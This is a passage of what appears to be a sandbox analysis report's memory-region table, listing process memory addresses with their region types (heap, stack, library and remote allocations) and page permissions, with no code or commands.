heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
203A2DDC000
|
heap
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page read and write
|
||
|
854C000
|
heap
|
page read and write
|
||
|
244CF000
|
heap
|
page read and write
|
||
|
203A3070000
|
heap
|
page read and write
|
||
|
7FF848E9C000
|
trusted library allocation
|
page execute and read and write
|
||
|
192FA880000
|
heap
|
page read and write
|
||
|
24301000
|
heap
|
page read and write
|
||
|
192FC500000
|
heap
|
page execute and read and write
|
||
|
8930000
|
trusted library allocation
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
551D000
|
heap
|
page read and write
|
||
|
88F0000
|
heap
|
page readonly
|
||
|
6F3E000
|
stack
|
page read and write
|
||
|
203A2E02000
|
heap
|
page read and write
|
||
|
8590000
|
heap
|
page read and write
|
||
|
16ACC250000
|
heap
|
page read and write
|
||
|
8AC8683000
|
stack
|
page read and write
|
||
|
192FCBFD000
|
heap
|
page read and write
|
||
|
8AC8D7D000
|
stack
|
page read and write
|
||
|
192FCA80000
|
heap
|
page read and write
|
||
|
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
192FA960000
|
heap
|
page read and write
|
||
|
3428000
|
heap
|
page read and write
|
||
|
203A2F92000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
867B000
|
stack
|
page read and write
|
||
|
192FABB0000
|
trusted library allocation
|
page read and write
|
||
|
244CF000
|
heap
|
page read and write
|
||
|
33C4000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
203A2F2E000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
8592000
|
heap
|
page read and write
|
||
|
192FAB70000
|
trusted library allocation
|
page read and write
|
||
|
203A2F12000
|
heap
|
page read and write
|
||
|
856D000
|
heap
|
page read and write
|
||
|
203A309F000
|
heap
|
page read and write
|
||
|
2F0F000
|
stack
|
page read and write
|
||
|
2437A000
|
heap
|
page read and write
|
||
|
192FAA3F000
|
heap
|
page read and write
|
||
|
8900000
|
heap
|
page read and write
|
||
|
236F0000
|
direct allocation
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
4D1F000
|
stack
|
page read and write
|
||
|
203A2FAD000
|
heap
|
page read and write
|
||
|
3000000
|
trusted library allocation
|
page read and write
|
||
|
24171000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
8720000
|
heap
|
page read and write
|
||
|
BBE000
|
stack
|
page read and write
|
||
|
857E000
|
heap
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
2DE0000
|
trusted library section
|
page read and write
|
||
|
2E0F000
|
unkown
|
page read and write
|
||
|
203A2F4A000
|
heap
|
page read and write
|
||
|
24262000
|
heap
|
page read and write
|
||
|
302A000
|
trusted library allocation
|
page execute and read and write
|
||
|
203A1128000
|
heap
|
page read and write
|
||
|
203A2F86000
|
heap
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
47CF000
|
stack
|
page read and write
|
||
|
4BFC000
|
heap
|
page read and write
|
||
|
23E5D000
|
stack
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
203A1048000
|
heap
|
page read and write
|
||
|
726D000
|
stack
|
page read and write
|
||
|
24171000
|
heap
|
page read and write
|
||
|
203A2F2E000
|
heap
|
page read and write
|
||
|
856D000
|
heap
|
page read and write
|
||
|
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
|
203A10F7000
|
heap
|
page read and write
|
||
|
EC1F6FE000
|
stack
|
page read and write
|
||
|
30EC000
|
heap
|
page read and write
|
||
|
BB3D000
|
direct allocation
|
page execute and read and write
|
||
|
2A7C000
|
stack
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
203A2F6A000
|
heap
|
page read and write
|
||
|
192FCAA2000
|
heap
|
page read and write
|
||
|
2446B000
|
heap
|
page read and write
|
||
|
8910000
|
trusted library allocation
|
page read and write
|
||
|
30CF000
|
stack
|
page read and write
|
||
|
4BEE000
|
heap
|
page read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
2455D000
|
unclassified section
|
page execute and read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
3240000
|
trusted library allocation
|
page read and write
|
||
|
2405F000
|
stack
|
page read and write
|
||
|
203A2E01000
|
heap
|
page read and write
|
||
|
8AC878F000
|
stack
|
page read and write
|
||
|
8AC9BCD000
|
stack
|
page read and write
|
||
|
4AE1000
|
heap
|
page read and write
|
||
|
244CC000
|
heap
|
page read and write
|
||
|
3004000
|
trusted library allocation
|
page read and write
|
||
|
203A2EFD000
|
heap
|
page read and write
|
||
|
7FF848E96000
|
trusted library allocation
|
page read and write
|
||
|
EC1F3FD000
|
stack
|
page read and write
|
||
|
7780000
|
trusted library allocation
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
23F5F000
|
stack
|
page read and write
|
||
|
5527000
|
heap
|
page read and write
|
||
|
CF3D000
|
direct allocation
|
page execute and read and write
|
||
|
192FC3E7000
|
heap
|
page read and write
|
||
|
23BBE000
|
stack
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
8AC8CFE000
|
stack
|
page read and write
|
||
|
3148000
|
heap
|
page read and write
|
||
|
3310000
|
heap
|
page read and write
|
||
|
2A50000
|
heap
|
page read and write
|
||
|
31CE000
|
stack
|
page read and write
|
||
|
203A30FB000
|
heap
|
page read and write
|
||
|
30C0000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
203A2F4E000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
85C8000
|
heap
|
page read and write
|
||
|
28DA000
|
stack
|
page read and write
|
||
|
8AC907E000
|
stack
|
page read and write
|
||
|
4C03000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
2B90000
|
heap
|
page read and write
|
||
|
203A1050000
|
heap
|
page read and write
|
||
|
857E000
|
heap
|
page read and write
|
||
|
203A112A000
|
heap
|
page read and write
|
||
|
19281299000
|
trusted library allocation
|
page read and write
|
||
|
203A3045000
|
heap
|
page read and write
|
||
|
192FCB80000
|
heap
|
page read and write
|
||
|
203A2F50000
|
heap
|
page read and write
|
||
|
192FAB20000
|
trusted library allocation
|
page read and write
|
||
|
8568000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BE8000
|
heap
|
page read and write
|
||
|
2EFF000
|
stack
|
page read and write
|
||
|
859D000
|
heap
|
page read and write
|
||
|
8AC8A7E000
|
stack
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
78D000
|
stack
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
2D4E000
|
stack
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
203A2DEB000
|
heap
|
page read and write
|
||
|
8A20000
|
direct allocation
|
page read and write
|
||
|
8573000
|
heap
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
4C19000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A2F8F000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A2F64000
|
heap
|
page read and write
|
||
|
857B000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page readonly
|
||
|
53ED000
|
heap
|
page read and write
|
||
|
24573000
|
unclassified section
|
page execute and read and write
|
||
|
203A2F4B000
|
heap
|
page read and write
|
||
|
786E000
|
stack
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
341E000
|
heap
|
page read and write
|
||
|
192FCBDD000
|
heap
|
page read and write
|
||
|
7FF848F91000
|
trusted library allocation
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
23CBE000
|
stack
|
page read and write
|
||
|
7080000
|
direct allocation
|
page read and write
|
||
|
240C1000
|
direct allocation
|
page execute and read and write
|
||
|
878A000
|
heap
|
page read and write
|
||
|
203A2EF4000
|
heap
|
page read and write
|
||
|
5253000
|
heap
|
page read and write
|
||
|
4C13000
|
heap
|
page read and write
|
||
|
31F5EFF000
|
stack
|
page read and write
|
||
|
2BE4000
|
stack
|
page read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
8AC87CF000
|
stack
|
page read and write
|
||
|
782E000
|
stack
|
page read and write
|
||
|
241E8000
|
heap
|
page read and write
|
||
|
203A2F9C000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page readonly
|
||
|
16ACC330000
|
heap
|
page read and write
|
||
|
203A2DD1000
|
heap
|
page read and write
|
||
|
23700000
|
direct allocation
|
page read and write
|
||
|
4C05000
|
heap
|
page read and write
|
||
|
203A104D000
|
heap
|
page read and write
|
||
|
2AB9000
|
stack
|
page read and write
|
||
|
342B000
|
heap
|
page read and write
|
||
|
76E5000
|
heap
|
page read and write
|
||
|
3E7D000
|
remote allocation
|
page execute and read and write
|
||
|
203A2F6A000
|
heap
|
page read and write
|
||
|
4C3D000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
203A3000000
|
remote allocation
|
page read and write
|
||
|
8A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
551B000
|
heap
|
page read and write
|
||
|
203A2F73000
|
heap
|
page read and write
|
||
|
203A114B000
|
heap
|
page read and write
|
||
|
24559000
|
unclassified section
|
page execute and read and write
|
||
|
2CDE000
|
stack
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
19290001000
|
trusted library allocation
|
page read and write
|
||
|
5BEA000
|
trusted library allocation
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
A7C000
|
stack
|
page read and write
|
||
|
203A2DEC000
|
heap
|
page read and write
|
||
|
192FAC20000
|
heap
|
page read and write
|
||
|
C53D000
|
direct allocation
|
page execute and read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
7651000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
5252000
|
heap
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
16ACC580000
|
heap
|
page read and write
|
||
|
722D000
|
stack
|
page read and write
|
||
|
2D8E000
|
stack
|
page read and write
|
||
|
79FB000
|
stack
|
page read and write
|
||
|
31DA000
|
heap
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
2BE2000
|
stack
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
192FC918000
|
heap
|
page read and write
|
||
|
2FE0000
|
heap
|
page read and write
|
||
|
8AC8C7E000
|
stack
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
85B0000
|
heap
|
page read and write
|
||
|
8560000
|
heap
|
page read and write
|
||
|
3010000
|
trusted library allocation
|
page read and write
|
||
|
4C23000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
2B6E000
|
unkown
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
4C62000
|
heap
|
page read and write
|
||
|
91A0000
|
direct allocation
|
page execute and read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
19280088000
|
trusted library allocation
|
page read and write
|
||
|
24452000
|
heap
|
page read and write
|
||
|
23FDF000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
50E0000
|
heap
|
page read and write
|
||
|
192FAB40000
|
trusted library allocation
|
page read and write
|
||
|
203A2F12000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
8387000
|
stack
|
page read and write
|
||
|
552A000
|
heap
|
page read and write
|
||
|
31F5DFF000
|
unkown
|
page read and write
|
||
|
2D08000
|
heap
|
page read and write
|
||
|
203A2F6A000
|
heap
|
page read and write
|
||
|
7F6D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7531000
|
heap
|
page read and write
|
||
|
2C4E000
|
stack
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
192FAC28000
|
heap
|
page read and write
|
||
|
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
|
68D000
|
stack
|
page read and write
|
||
|
236D0000
|
direct allocation
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
4C03000
|
heap
|
page read and write
|
||
|
46A8000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C13000
|
heap
|
page read and write
|
||
|
192FAA49000
|
heap
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
241E8000
|
heap
|
page read and write
|
||
|
4BF5000
|
heap
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
8584000
|
heap
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
203A2F2E000
|
heap
|
page read and write
|
||
|
203A1045000
|
heap
|
page read and write
|
||
|
857B000
|
heap
|
page read and write
|
||
|
50E1000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A1090000
|
heap
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
203A2DDF000
|
heap
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
4BEC000
|
heap
|
page read and write
|
||
|
236E0000
|
direct allocation
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
2BDF000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
23730000
|
direct allocation
|
page read and write
|
||
|
203A30F0000
|
heap
|
page read and write
|
||
|
8AC8FFE000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
24275000
|
heap
|
page read and write
|
||
|
EC1F8FC000
|
stack
|
page read and write
|
||
|
2B70000
|
heap
|
page read and write
|
||
|
86FC000
|
stack
|
page read and write
|
||
|
50E1000
|
heap
|
page read and write
|
||
|
203A1186000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
23760000
|
direct allocation
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
19290021000
|
trusted library allocation
|
page read and write
|
||
|
4C05000
|
heap
|
page read and write
|
||
|
19282017000
|
trusted library allocation
|
page read and write
|
||
|
8573000
|
heap
|
page read and write
|
||
|
23720000
|
direct allocation
|
page read and write
|
||
|
5283000
|
trusted library allocation
|
page read and write
|
||
|
70A0000
|
heap
|
page execute and read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
203A2EF3000
|
heap
|
page read and write
|
||
|
192FAA3B000
|
heap
|
page read and write
|
||
|
2DD0000
|
trusted library section
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
23D4E000
|
stack
|
page read and write
|
||
|
3317000
|
heap
|
page read and write
|
||
|
89BD000
|
stack
|
page read and write
|
||
|
707D000
|
remote allocation
|
page execute and read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
23E1C000
|
stack
|
page read and write
|
||
|
7620000
|
heap
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
203A116B000
|
heap
|
page read and write
|
||
|
24422000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A2F5C000
|
heap
|
page read and write
|
||
|
203A10D8000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
8571000
|
heap
|
page read and write
|
||
|
4C06000
|
heap
|
page read and write
|
||
|
203A2F64000
|
heap
|
page read and write
|
||
|
19280675000
|
trusted library allocation
|
page read and write
|
||
|
203A10BF000
|
heap
|
page read and write
|
||
|
192FAB00000
|
trusted library allocation
|
page read and write
|
||
|
240C0000
|
direct allocation
|
page read and write
|
||
|
23BFD000
|
stack
|
page read and write
|
||
|
4C04000
|
heap
|
page read and write
|
||
|
2D23000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
203A2F6A000
|
heap
|
page read and write
|
||
|
203A2DD1000
|
heap
|
page read and write
|
||
|
3319000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
203A2F12000
|
heap
|
page read and write
|
||
|
203A1040000
|
heap
|
page read and write
|
||
|
203A2F5C000
|
heap
|
page read and write
|
||
|
203A2DD0000
|
heap
|
page read and write
|
||
|
8A10000
|
direct allocation
|
page read and write
|
||
|
203A2E01000
|
heap
|
page read and write
|
||
|
3079000
|
heap
|
page read and write
|
||
|
203A1117000
|
heap
|
page read and write
|
||
|
192FA9C0000
|
heap
|
page read and write
|
||
|
203A2FC7000
|
heap
|
page read and write
|
||
|
50E1000
|
heap
|
page read and write
|
||
|
9D3D000
|
direct allocation
|
page execute and read and write
|
||
|
8AC917C000
|
stack
|
page read and write
|
||
|
77D0000
|
trusted library allocation
|
page read and write
|
||
|
203A2F7A000
|
heap
|
page read and write
|
There are 905 hidden memdumps, click here to show them.